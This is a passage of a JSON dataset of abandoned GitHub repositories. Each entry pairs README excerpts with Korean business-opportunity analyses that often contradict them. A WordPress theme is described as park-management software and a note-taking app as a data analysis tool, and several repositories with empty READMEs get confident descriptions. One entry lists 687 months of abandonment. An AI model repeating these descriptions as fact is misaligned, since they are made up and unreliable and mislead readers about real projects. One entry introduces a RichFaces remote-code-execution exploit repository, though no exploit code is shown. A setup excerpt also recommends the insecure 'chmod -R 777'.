g:vim_printer_items = {\n      \\ 'javascript': 'console.log(\"{$}:\", {$})',\n      \\ }\n```\n\n\n\n## Future TODO\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"thomasjbradley/spritebot","github_url":"https://github.com/thomasjbradley/spritebot","stars":6,"language":"JavaScript","license":"gpl-3.0","abandonment_months":103,"description":"# Spritebot 저장소 분석\n\n## 왜 보물인가\n게임이나 웹사이트에서 사용하는 이미지들을 자동으로 정리하고 최적화해주는 도구로, 개발자의 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 스튜디오 SaaS**: 소규모 게임 제작팀을 위한 클라우드 기반 이미지 처리 서비스\n2. **웹 에이전시 내부 도구**: 웹디자","readme_excerpt":"# ![](.readme/spritebot-logo.png) Spritebot\n\n*Your awkwardly ostentatious optimizing robot.*\n\n![](.readme/screenshot.png)\n\n**This application is essentially a GUI wrapper around [SVGO](https://github.com/svg/svgo), but without all the configuration of [SVGOMG](https://jakearchibald.github.io/svgomg/).**\n\nI was inspired to create it because my students needed a simpler SVG batch processing tool since [SVG-GUI](https://github.com/svg/svgo-gui) isn’t maintained any more.\n\nThe additional feature Spritebot brings, that isn’t available in the other tools, is the generation of SVG sprite sheets.\n\nBuilt with Javascript, Node.js & Electron.\n\n---\n\n## Download\n\nDownload the latest version of Spritebot below:\n\n### [⬇ Download for MacOS](https://github.com/thomasjbradley/spritebot/releases/download/v1.3.3/Spritebot-1.3.3.dmg)\n### [⬇ Download for Windows](https://github.com/thomasjbradley/spritebot/releases/download/v1.3.3/Spritebot-Setup-1.3.3.exe)\n\n---\n\n## Using the sprite sheets\n\nThe sprite sheet","composite_score":0.3005,"license_safety_tag":"restricted"},{"name":"fossasia/fossbridge-artwork","github_url":"https://github.com/fossasia/fossbridge-artwork","stars":12,"language":"HTML","license":"unknown","abandonment_months":71,"description":"# fossasia/fossbridge-artwork 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티의 시각 자산(로고, 아이콘, 배너 등)을 한 곳에서 관리할 수 있어 브랜드 일관성을 유지하면서 누구나 자유롭게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **오픈소스 프로젝트 지원 플랫폼**: 다양한 오픈소스 커뮤니티의 브랜드 자산을 통합 관리하고 ","readme_excerpt":"# FOSSBridge.com\n\nhttps://fossbridge.com\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"MQZHot/MTransparentNav","github_url":"https://github.com/MQZHot/MTransparentNav","stars":18,"language":"Objective-C","license":"mit","abandonment_months":95,"description":"# MTransparentNav 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 상단 상태바를 투명하게 만들어 화면을 더 넓게 쓸 수 있는 간단하면서도 많은 앱들이 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 저가형 앱 개발 템플릿 판매**\n- 초보 개발자들을 위해 이 기능이 포함된 앱 개발 템플릿을 월 9,900원대에 ","readme_excerpt":"\n\n## MTransparentNav\n\nChange NavigationBar's color and transparency\n\n导航栏滑动渐变\n\n<p align=\"center\">\n<img src=\"https://img.shields.io/badge/platform-iOS-yellow.svg\">\n<img src=\"https://img.shields.io/cocoapods/v/TransparentNav.svg?style=flat\">\n</p>\n\n<p align=\"center\">\n<img src=\"https://github.com/MQZHot/MTransparentNav/raw/master/Picture/pic0.gif\">\n</p>\n\n\n## Usage\n\nIn the need to change the color of the controller\n\n```objc\nself.navAlpha = 0;\nself.navTintColor = [UIColor whiteColor];\nself.navTitleColor = [UIColor whiteColor];\nself.navBackgroundColor = [UIColor greenColor];\n\n```\n\nYou can change nav tintColor and barTintColor in UIScrollViewDelegate\n\n```swift\n-(void)scrollViewDidScroll:(UIScrollView *)scrollView{\n    CGFloat y = scrollView.contentOffset.y;\n    self.navAlpha = y / 80;\n    if (y > 80) {\n        self.navTitleColor = self.navTintColor = [UIColor redColor];\n    } else {\n        self.navTitleColor = y < 0 ? [UIColor clearColor] : [UIColor whiteColor];\n        self.navTintColor = y <","composite_score":0.3005,"license_safety_tag":"safe"},{"name":"fossasia/2017.codeheat.org","github_url":"https://github.com/fossasia/2017.codeheat.org","stars":11,"language":"CSS","license":"unknown","abandonment_months":82,"description":"# fossasia/2017.codeheat.org 분석\n\n## 왜 보물인가\n프로그래밍 대회 참가자들의 성적을 추적하고 관리하는 웹사이트로, 프로그래밍 교육 기관이나 대회 주최자들이 참가자 관리에 바로 써먹을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학교의 프로그래밍 경진대회나 온라인 코딩 교육 플랫폼에서 학생들의 성적 순위","readme_excerpt":"# Codeheat.org website\n\nIn the heat of the code is a coding contest run by FOSSASIA, friends and partners.\n\nOfficial website: http://codeheat.org\n\nDevelopment Workflow:->\n\nFixing issues\n\nStep 1: Pick an issue to fix\n\nAfter selecting the issue\n\n1.Comment on the issue saying you are working on the issue.\n\n2.We expect you to discuss the approach either by commenting or in the gitter.\n\n3.Updates or progress on the issue would be nice.\n\nStep 2: Coding Policy\n\nPlease help us follow the best practice to make it easy for the reviewer as well as the contributor. We want to focus on the code quality more than on managing pull request ethics.\nSingle commit per pull request\nFor writing commit messages please adhere to the Commit style guidelines.\nFollow uniform design practices. The design language must be consistent throughout the app.\nThe pull request will not get merged until and unless the commits are squashed. In case there are multiple commits on the PR, the commit author needs to squash the","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"kaist-ami/Axial-mm","github_url":"https://github.com/kaist-ami/Axial-mm","stars":26,"language":"","license":"unknown","abandonment_months":687,"description":"# Axial-mm 저장소 분석\n\n## 왜 보물인가\n멀티모달(여러 종류의 데이터) 처리 기술로, 텍스트·이미지·음성 등을 동시에 이해하는 AI 모델을 만드는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: 의사가 X-ray 사진과 환자 설명을 함께 입력하면 진단 보조 결과를 제공하는 웹 서비스\n2. **전자상거래 상품 검","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"yacy/YaCyBar","github_url":"https://github.com/yacy/YaCyBar","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":135,"description":"# YaCyBar 저장소 분석\n\n## 왜 보물인가\n검색 엔진 기술의 핵심 부분을 활용한 브라우저 확장 도구로, 검색과 정보 접근 방식을 혁신할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 직원들이 사내 문서와 웹을 동시에 검색할 수 있는 통합 검색 도구\n- **내부 업무 도구**: 법률 회사나 컨설팅 업체의 수백","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"Rich-Harris/svelte-gl-boxes","github_url":"https://github.com/Rich-Harris/svelte-gl-boxes","stars":20,"language":"HTML","license":"unknown","abandonment_months":42,"description":"","readme_excerpt":"# svelte-gl-boxes\n\nA quick demo I made for [this Twitter thread](https://twitter.com/Rich_Harris/status/1200805237948325888).\n\nhttps://svelte-gl-boxes.surge.sh/\n\n\n## Running locally\n\nClone the repo, install dependencies, `npm run dev`, open [localhost:5000](http://localhost:5000):\n\n```\ngit clone https://github.com/Rich-Harris/svelte-gl-boxes\ncd svelte-gl-boxes\nnpm i\nnpm run dev\n```\n\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/2011.fossasia.org","github_url":"https://github.com/fossasia/2011.fossasia.org","stars":11,"language":"HTML","license":"unknown","abandonment_months":32,"description":"# FOSSASIA 2011 컨퍼런스 웹사이트 분석\n\n## 왜 보물인가\n10년 이상 된 아시아 오픈소스 컨퍼런스의 공식 웹사이트로, 오픈소스 커뮤니티의 역사적 기록과 네트워킹 자산을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 아카이브 플랫폼**: 과거 행사의 발표 자료, 참석자 정보, 일정을 보존하고 검색할 수 있는 SaaS 서비스\n2. ","readme_excerpt":"FOSSASIA Summit 2011\n==========\n\nhttps://2011.fossasia.org\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"syriusbughunt/CVE-2018-14667","github_url":"https://github.com/syriusbughunt/CVE-2018-14667","stars":6,"language":"Java","license":"unknown","abandonment_months":91,"description":"# CVE-2018-14667 분석 보고서\n\n## 왜 보물인가\n2018년 발견된 보안 취약점을 활용한 기술로, 기업의 정보 유출을 방지하거나 보안을 테스트하려는 조직들에게 중요한 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 기업의 시스템이 과거 알려진 취약점에 노출되었는지 자동으로 검사해주는 온라인 서비스\n2. **내부 보","readme_excerpt":"# CVE-2018-14667\n\nAfter spending many time to understand and correctly exploit this CVE, I decided to build a repo on the RichFaces 3.X RCE bug and share the HOWTOs step by step with the community.\n\n**0x00 : Introduction on RichFaces 3.X bug**\n<p align=\"left\">\n  <img src=\"https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/RichFaces.jpg\" width=\"350\" title=\"hover text\">\n</p>\n\nOn Monday, November 19, *Joao F M Figueiredo* published a well detailed article (https://seclists.org/fulldisclosure/2018/Nov/47) on a critical high-risk RichFaces vulnerability.  \n**CVSS3 Base Score\t9.8**\n\nThis vulnerability will allow any unauthenticated users to perform remote code execution on any web application using RichFaces 3.X (all version) which is pretty much the worst case scenario.\n\n**0x01 : Am I affected?**&nbsp; <img src=\"https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/screaming.jpg\" width=\"20\"/>\n\nWell, if you are running RichFaces 3.X (any version of ","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/phimpme-wordpress","github_url":"https://github.com/fossasia/phimpme-wordpress","stars":10,"language":"PHP","license":"unknown","abandonment_months":118,"description":"# FOSSASIA/PHIMPME-WORDPRESS 평가\n\n## 왜 보물인가\n사진 관리 기능을 워드프레스(누구나 쓸 수 있는 블로그 플랫폼)에 통합한 도구로, 중소 규모 웹사이트 운영자들이 별도 비용 없이 전문적인 이미지 관리를 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진작가나 콘텐츠 제작자를 위한 클라우드 기반 사진 갤러","readme_excerpt":"In order to install Wordpress Phimpme and test the system on your local host, please follow the following steps:\n\n\n1. Restore database from sql file in wordpress/sql folder\n  a. Login to mysql use command line:\n     mysql -uroot -p\n  b. create phimpme_drupal database : \n     CREATE DATABASE phimpme_wordpress;\n     exit;\n\n  c. Restore database :\n     mysql -u root -p phimpme_wordpress < link to phimpme_wordpress.sql file\n     e.g :\n     mysql -u root -p phimpme_wordpress < ~/phimpme.cms/wordpress/sql/phimpme_wordpress.sql\n\n\n2. Move wordpress website folder to /var/www/ or your specific lolalhost directory and change permission for this folder.\n    - Command: cd /var/www/wordpress\n    - Command: sudo chmod -R 777 wordpress/\n\n3. Open file wp-config.php and change value of Database in line 18 like this :\n\n/** The name of the database for WordPress */\ndefine('DB_NAME', 'phimpme_wordpress');\n\n/** MySQL database username */\ndefine('DB_USER', 'mysql_username');\n\n/** MySQL database password */\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"Yipin/Dance_Dance_Generation","github_url":"https://github.com/Yipin/Dance_Dance_Generation","stars":7,"language":"Python","license":"unknown","abandonment_months":80,"description":"# Dance_Dance_Generation 프로젝트 분석\n\n## 왜 보물인가\n음악에 맞춰 춤을 자동으로 생성하는 기술로, 뮤직비디오·게임·공연 제작 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **뮤직비디오 제작 SaaS**: 뮤지션들이 노래를 업로드하면 자동으로 춤 영상을 만들어주는 온라인 서비스\n2. **게임사 개발 도구**","readme_excerpt":"# Dance Dance Generation\n### [[Paper]](https://arxiv.org/abs/1904.00129) \nPytorch implementation of Dance Dance Generation: Motion Transfer for Internet Videos.\n\n## Acknowledgments\nThis code is heavily built on the top of [Pix2pixHD](https://github.com/NVIDIA/pix2pixHD).\nWe thank the authors for their great work as well as releasing the code.\n\n\n## Getting Started\n### Prerequisites\n- Python 2.x / Python 3.x\n- Pytorch 0.4.0+\n- Nvidia GPU (12G+ memory recommended)\n- According CUDA + CuDNN\n\n### Training\nThe two-stage motion transfer model has been trained under two resolutions:\n256x256 (low res) and 512x512 (high res). Please note that the number of \nfilters of the first conv layer (--ngf) is half size of the original \npix2pixHD work for the memory limitation. Feel free to increase the number to \nfurther improve the generation quality if GPU memory allowed \n(haven't been fully tested).\n\nTrain low res model:\n```bash\npython train.py --name personal_transfer_256p --resize_or_crop none --datar","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"tundra-code/aurora","github_url":"https://github.com/tundra-code/aurora","stars":13,"language":"JavaScript","license":"unknown","abandonment_months":98,"description":"# Aurora 저장소 분석\n\n## 왜 보물인가\n오로라는 데이터를 빠르게 처리하고 분석하는 도구로, 대량의 정보를 다루는 조직에서 의사결정을 더 빠르게 할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼으로 제공하여 중소기업들이 고객 행동을 파악하고 마케팅 전략을 수립하게 지원\n2. **내부 업무 도구**:","readme_excerpt":"# Aurora\n\n## Overview\nAurora is an open source note taker with first class support for third part extensions. It's built on [react-mutate](https://github.com/Flaque/react-mutate), a framework for creating \"mutations\" in React.\n\nIt's still a little early in the process, but here's the general idea of what we're building at the moment:\n\n\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/QCrot4G.png\" alt=\"Light mode ui mockup\" width=\"700px\" />\n</p>\n\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/kURH8c2.png\" alt=\"Dark mode ui mockup\" width=\"700px\" />\n</p>\n\n\n## For Devs\nThe use of the [yarn](https://yarnpkg.com/) package manager is **strongly** recommended, as opposed to using `npm`.\n\n### Development Scripts\n\n```bash\n# run application in development mode\nyarn dev\n# Also display redux acton logs (warning: it logs a lot)\nyarn dev-log-redux\n\n# compile source code and create webpack output\nyarn compile\n\n# `yarn compile` & create build with electron-builder\nyarn dist\n\n# `yarn compile` & cr","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"yacy/yacy_webclient_authentication","github_url":"https://github.com/yacy/yacy_webclient_authentication","stars":11,"language":"PHP","license":"apache-2.0","abandonment_months":132,"description":"# YaCy 웹 클라이언트 인증 시스템 분석\n\n## 왜 보물인가\n검색 엔진을 누구나 안전하게 사용할 수 있도록 하는 로그인 및 접근 제어 기술로, 개인 정보 보호가 중요한 모든 온라인 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 검색 플랫폼 (SaaS)**\n- 직원들만 사내 문서를 검색할 수 있는 보안 검색 서비스로 운영\n\n**2. ","readme_excerpt":"YaCy Search Authorization and Authentication\n\nWHAT IS THIS?\nThe purpose of this service is the authentication of search users;\nit does an authentication of users and identifies their user rights.\nSuch rights are expressed with sets of specific collections names\nwhich had been used to index data in the YaCy search engine.\nThis is done using a reverse proxy to a YaCy search server. It\nserves as a filter for search requests from a JSON search\nclient like https://github.com/yacy/yacy_webclient_bootstrap\nThe server attribute within the searchpage_template_yaml4 must point\nto the location of this file on a php-enabled server.\n\nWORKFLOW\nThe authorization is done in an external system (i.e. LDAP server\nlike Active Directory). The external system names access domains\nfor the user which is matched with collection names in this module.\n\nHOW TO INSTALL\n- copy this file on a web space with a php interpreter\n- modify the php.ini file and set the attribute allow_url_fopen to 1\n- change the external_u","composite_score":0.3005,"license_safety_tag":"safe"},{"name":"fossasia/api.fossasia.net","github_url":"https://github.com/fossasia/api.fossasia.net","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":90,"description":"# fossasia/api.fossasia.net 분석 보고서\n\n## 왜 보물인가\n오픈소스 컨퍼런스와 해커톤의 정보를 한곳에서 체계적으로 관리하고 공유할 수 있는 기술로, 행사 운영의 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사 관리 SaaS**: 컨퍼런스, 세미나, 해커톤 주최자들을 위한 온라인 행사 정보 관리 및 공유 플랫","readme_excerpt":"FOSSASIA API\n====\n\n[![Join the chat at https://gitter.im/fossasia/api.fossasia.net](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/api.fossasia.net?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## History\n\nOur goal is to collect information about Open Source Communities and Hackspaces all over Asia. This information will be used to aggregate contact data, locations, news feeds and events.\nWe adopted this API from the Hackerspaces and Freifunk API, invented years before to collect decentralized data.\n\nAt the Wireless Community Weekend 2013 in Berlin there was a first meeting to relaunch freifunk.net. To represent local communities without collecting and storing data centrally, a way had to be found. Another requirement was to enable local communities to keep their data up to date easily.\n\nBased on the Hackerspaces API (http://hackerspaces.nl/spaceapi/) the idea of the freifunk API was born: Each community provides its data in a well d","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"souporserious/react-aria","github_url":"https://github.com/souporserious/react-aria","stars":15,"language":"JavaScript","license":"mit","abandonment_months":69,"description":"# react-aria 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 장애인도 쉽게 사용할 수 있도록 돕는 기술 모음으로, 누구나 접근 가능한 디지털 서비스를 만드는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 협업 도구나 프로젝트 관리 플랫폼에서 모든 직원이 동등하게 사용할 수 있는 인터페이스 구축\n2. **내부","readme_excerpt":"# Archived\n\nThis project has been archived. Please use [react-aria](https://react-spectrum.adobe.com/react-aria/index.html) from Adobe.\n\n## React ARIA\n\n[![npm version](https://badge.fury.io/js/react-aria.svg)](https://badge.fury.io/js/react-aria)\n[![Dependency Status](https://david-dm.org/souporserious/react-aria.svg)](https://david-dm.org/souporserious/react-aria)\n\nA set of utility components to help compose ARIA components in React. Please feel free to file an issue or submit a PR if you feel these can be more ARIA compliant ❤️\n\n## Usage\n\n`yarn add react-aria`\n\n`npm install react-aria --save`\n\n```html\n<script src=\"https://unpkg.com/react-aria/dist/react-aria.js\"></script>\n(UMD library exposed as `ReactARIA`)\n```\n\n### Building a select menu\n\n```jsx\nimport { Trigger, Select } from 'react-aria'\n\nconst { Manager, OptionList, Option } = Select\n\nclass SelectMenu extends Component {\n  state = {\n    selection: null\n  }\n\n  _handleSelection = (item, e) => {\n    this.setState({\n      selection:","composite_score":0.3005,"license_safety_tag":"safe"},{"name":"fossasia/calendar.fossasia.org","github_url":"https://github.com/fossasia/calendar.fossasia.org","stars":12,"language":"CSS","license":"unknown","abandonment_months":78,"description":"# FOSSASIA 캘린더 프로젝트 평가\n\n## 왜 보물인가\n오픈소스 커뮤니티 행사를 한 곳에서 관리할 수 있는 통합 캘린더 솔루션으로, 전 세계 기술 커뮤니티의 행사 정보를 실시간으로 공유합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기술 커뮤니티나 학회를 위한 월 구독형 행사 일정 관리 플랫폼\n- **내부 업무 도구**: 대규모 IT ","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/sciencehack.asia","github_url":"https://github.com/fossasia/sciencehack.asia","stars":11,"language":"CSS","license":"unknown","abandonment_months":93,"description":"# fossasia/sciencehack.asia 분석\n\n## 왜 보물인가\n과학 분야의 혁신적인 아이디어와 개발자들을 연결하는 오픈소스 플랫폼으로, 전 세계 과학 교육과 연구의 접근성을 높일 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **과학 교육 플랫폼**: 학생과 교사를 위한 온라인 과학 실험·학습 커뮤니티 SaaS로 월 구독료 징수\n","readme_excerpt":"Website of Science Hack in Asia:\n\nhttps://sciencehack.asia\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"yacy/yacy-search","github_url":"https://github.com/yacy/yacy-search","stars":12,"language":"Python","license":"unknown","abandonment_months":194,"description":"# YaCy Search 저장소 분석\n\n## 왜 보물인가\n구글처럼 누구나 자신의 검색 엔진을 만들 수 있는 오픈소스 기술로, 대기업 검색 서비스에 의존하지 않는 독립적인 검색 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 대기업이 사내 문서, 이메일, 파일들을 자체 검색엔진으로 관리하는 시스템\n2. **SaaS 서비","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fqrouter/fss","github_url":"https://github.com/fqrouter/fss","stars":25,"language":"","license":"unknown","abandonment_months":103,"description":"# fqrouter/fss 평가 분석\n\n## 왜 보물인가\n네트워크 트래픽을 효율적으로 관리하고 속도를 최적화하는 기술로, 인터넷 연결이 느린 지역이나 많은 사용자가 동시에 접속하는 환경에서 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 인터넷 회사가 고객들에게 제공하는 속도 최적화 솔루션으로 월정액 구독 판매\n- **내부 업무 도","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/wp-accesspress-twitter-feed","github_url":"https://github.com/fossasia/wp-accesspress-twitter-feed","stars":11,"language":"PHP","license":"unknown","abandonment_months":116,"description":"# fossasia/wp-accesspress-twitter-feed 상품화 분석\n\n## 왜 보물인가\n트위터의 최신 글들을 웹사이트에 자동으로 표시해주는 도구로, SNS 마케팅 효과를 쉽게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소상공인 대상 \"SNS 자동 연동 서비스\"로 월 구독료 수익 창출\n2. **내부 업무 도구*","readme_excerpt":"﻿=== AccessPress Twitter Feed ===\r\n\r\nContributors: Access Keys\r\nTags: twitter, twitter feeds, twitter slider, twitter feeds slider, twitter plugin, twitter feed plugin, twitter tweets, tweets, twitter tweet plugin, recent tweets widget, recent tweets plugin, recent tweet feeds\r\nDonate link: http://accesspressthemes.com/donation/\r\nRequires at least: 3.8\r\nTested up to: 4.3\r\nStable tag: 1.3.5\r\nLicense: GPLv2 or later\r\nLicense URI: http://www.gnu.org/licenses/gpl-2.0.html\r\n\r\nDisplay real-time Twitter feeds on your website. Update your website visitors with your latest Tweets.\r\n\r\n== Description ==\r\n\r\n<strong>AccessPress Twitter Feed</strong> is a FREE Twitter plugin for WordPress. You can use this to display real time Twitter feeds on any where on your webiste by using shortcode or widgets. Display tweets as a feed or in slider. It just takes a few minute to set it up and use. Start strong Twitter integration right on your website and increase your social reach to next level.\r\n\r\n \r\n\r\n\r\n= Fr","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/yaydoc-artwork","github_url":"https://github.com/fossasia/yaydoc-artwork","stars":11,"language":"","license":"unknown","abandonment_months":58,"description":"# fossasia/yaydoc-artwork 분석\n\n## 왜 보물인가\n오픈소스 문서 생성 도구의 디자인 자산을 모아놓은 저장소로, 전문적인 문서 디자인이 필요한 스타트업이나 소규모 팀에게 즉시 활용 가능한 템플릿 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 문서 생성 플랫폼에서 기본 템플릿으로 제공하여 사용자가 전문적인 문","readme_excerpt":"# yaydoc artwork\n\nArtwork repsitory for the yaydoc project\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/knitting.fossasia.org","github_url":"https://github.com/fossasia/knitting.fossasia.org","stars":11,"language":"","license":"unknown","abandonment_months":91,"description":"# 뜨개질 교육 플랫폼 (knitting.fossasia.org) 사업화 분석\n\n## 왜 보물인가\n누구나 온라인으로 뜨개질을 배울 수 있는 교육 플랫폼으로, 수공예 취미 시장이 확대되면서 수요가 증가하고 있는 분야입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독 회원제 온라인 뜨개질 강좌 플랫폼으로 월 수수료 징수\n- **내부 업무 도구","readme_excerpt":"Open Source Knitting\n=================\n\nOn this page you find an overview of [FOSSASIA][fossasia] Open Source Knitting Projects and how to start to [get involved][how-to-contribute].\n\n- [Communication](#communication)\n- [Knitting Projects][project-list]\n  - [kniteditor][kniteditor]\n  - [knittingpattern][knittingpattern]\n  - [AYABInterface][AYABInterface]\n  - [circle-knitting][circle-knitting]\n- [How to Contribute][how-to-contribute]\n- [Other Projects][other-projects]\n- [Inactive Projects][inactive-projects]\n\nCommunication\n-------------------------\n\n**Slack:** [FOSSASIA][fossasia] has a [Slack][slack] to chat in the community. You can use the main channel or **#knitting**. The current project lead of the knitting project is [github][github-niccokunzmann] and on [Slack][slack] under the name \"niccokunzmann\". Feel free to get in touch directly for questions.\n\n**Gitter:** We have a Gitter chat which you can join as well at [gitter.im/fossasia/knitapps](https://gitter.im/fossasia/knitapps)\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"SuperhackMelbourne/superhack2017","github_url":"https://github.com/SuperhackMelbourne/superhack2017","stars":5,"language":"","license":"unknown","abandonment_months":103,"description":"# SuperhackMelbourne/superhack2017 분석\n\n## 왜 보물인가\n2017년 멜번 해커톤 이벤트의 결과물로, 창의적인 기술 솔루션들이 모여 있어 새로운 사업 아이디어나 기술 트렌드를 발굴하는 데 참고할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **해커톤 플랫폼 SaaS**: 기업이나 학교에서 자체 해커톤을 개최할 때 참가자 모집,","readme_excerpt":"# Superhack2017\n\nSuperhack is organised by MUEEC (Melbourne University Electrical Engineering Club) and CISSA (Computing and Information Systems Students' Association) aiming at high school girls to promote women in tech.\n\nWe would like to thank our sponsors: IBM, Bosch, Deloitte, Github, Tekt Industries, Microsoft, Salesforce and Melbourne School of Engineering for their support.\n\nWe will be using IBM BlueMix & Node Red, with a custom Tekt Board connecting to a variety of sensors, sourced from a [Grove starter kit.](https://www.seeedstudio.com/Grove-Starter-Kit-Plus-p-1294.html)\n\nThis repo will be updated with the basic tutorials for the aforementioned technologies as we get closer to the event!\n\n\n\n## Getting starting\nFollow [Installation guide](https://github.com/SuperhackMelbourne/superhack2017/blob/master/Installation.md) to get started with Mongoose OS on the custom Tekt Board.\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/xmario_buildscript","github_url":"https://github.com/fossasia/xmario_buildscript","stars":11,"language":"Shell","license":"unknown","abandonment_months":167,"description":"# XMario Buildscript 분석 보고서\n\n## 왜 보물인가\n이 프로젝트는 마리오 게임을 자동으로 만들어주는 도구로, 게임 제작의 복잡한 과정을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 제작 SaaS**: 초보자도 드래그앤드롭으로 레벨을 만들 수 있는 온라인 게임 에디터 서비스\n2. **교육용 내부 도구**: 프로그래밍 학원","readme_excerpt":"buildscript\n===========\n\nx-mario build script","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/green-park-2","github_url":"https://github.com/fossasia/green-park-2","stars":12,"language":"PHP","license":"unknown","abandonment_months":117,"description":"# green-park-2 분석 보고서\n\n## 왜 보물인가\n도시 공원 관리를 디지털화하여 시민들이 더 쾌적한 녹지 환경을 누릴 수 있도록 돕는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **지자체용 SaaS**: 공원 시설 관리, 예약, 유지보수 일정 추적 시스템으로 운영 비용 절감\n2. **내부 업무 도구**: 공원 관리자의 일일 점검, 민원","readme_excerpt":"Cordobo Green Park 2\n============\n\nThe official Wordpress Theme Repository for Cordobo Green Park 2.\n\nRelease Notes for Green Park 1.0.0-beta.10 (Beta 10)\n\n\nDEMO: http://themes.cordobo.com/\n\nDOWNLOAD: http://cordobo.com/green-park-2/\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"michelleN/helm-secure-tiller","github_url":"https://github.com/michelleN/helm-secure-tiller","stars":10,"language":"Shell","license":"NOASSERTION","abandonment_months":94,"description":"# michelleN/helm-secure-tiller 사업화 분석\n\n## 왜 보물인가\n클라우드 서버 관리 시 보안 취약점을 자동으로 차단해주는 도구로, 대규모 시스템을 안전하게 운영하려는 기업들의 필수 요구사항을 충족합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 인프라 관리 플랫폼에 통합하여 고객사 서버 보안을 자동 강화하는 ","readme_excerpt":"# The Tiller-RBAC Plugin\nThis Helm plugin allows you to add an RBAC profile to a Tiller in a Kubernetes namespace. An **RBAC Profile** is a Helm chart that consists of a Kubernetes Role and RoleBinding definition. This plugin is designed to help the team of operators that set up multiple Tillers in their cluster (one Tiller per namespace) ensure that a Tiller is locked down to specific actions on specific Kubernetes resources in a given namespace.\n\n\n## Usage\n```console\n$ helm tiller-rbac [flags] RBAC_PROFILE\n```\n\n### Flags\n```\n --namespace string   namespace of Tiller to apply profile (default \"default\")\n```\n\n## Install\n```console\n$ helm plugin install https://github.com/michelleN/helm-tiller-rbac\n```\nThe above will fetch the latest binary release of `helm tiller-rbac` and install it.\n\n### Developer (From Source) Install\n\nIf you would like to handle the build yourself, instead of fetching a binary, this is how recommend doing it.\n\nFirst, set up your environment:\n\n - You need to have [G","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"michaelsboost/svgMotion","github_url":"https://github.com/michaelsboost/svgMotion","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":26,"description":"# michaelsboost/svgMotion 기술 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 그림과 도형을 부드럽게 움직이게 만드는 도구로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 디자인 소프트웨어나 온라인 애니메이션 제작 플랫폼에 내장하여 구독 고객에게 제공\n2. **내부 업무 도구**: 기","readme_excerpt":"svgMotion\n===================\n\nI love making vector animations but finding an app to make vector animations on a phone simply didn't exist. Desktop users have [Animate CC](https://www.adobe.com/products/animate.html), [After Effects](https://www.adobe.com/products/aftereffects.html), [Toon 